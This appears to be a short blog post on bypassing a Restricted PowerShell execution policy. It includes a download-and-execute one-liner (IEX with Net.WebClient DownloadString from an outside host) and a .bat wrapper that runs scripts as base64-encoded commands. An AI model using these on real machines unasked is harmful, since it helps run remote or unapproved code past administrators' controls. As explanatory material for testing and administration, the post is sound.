Getting Around Powershell Restrictions

The powershell execution policy can be limiting.  Find out what yours is by entering powershell and typing Get-ExecutionPolicy:

powershell_execution

If the policy is set to Restricted, that means scripts are not allowed.  Only the interactive shell is allowed.  The obvious thing to do is try to use Set-ExecutionPolicy and change it, but you can’t always do that. Here are some ways around that:

1) Just paste the powershell script in and then run it.  This only works for smaller scripts

2) Download and load the powershell script as described in the previous entry using hte following command: IEX (New-Object Net.WebClient).DownloadString(“https://script.com/colesec.ps1”)

3) Use a .bat file to base64 encode everything first and then load it up.  It slows down the script some, but for some reason it works.  This is the reason for this blog post.

Create a .bat file with the following contents:

powershell.exe -noprofile -Command "powershell.exe -noprofile -encodedCommand ([Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes((gc %1 |%%{$_}|out-string))))"

Then just run the .bat file, following by the ps1 file you want to run:

> PS.bat helloworld.ps1
Hello World

psbypass

There are lots of other ways to go about doing this as well.  Here is a link with 15 ways to do it:

https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/

Leave a Reply

Your email address will not be published. Required fields are marked *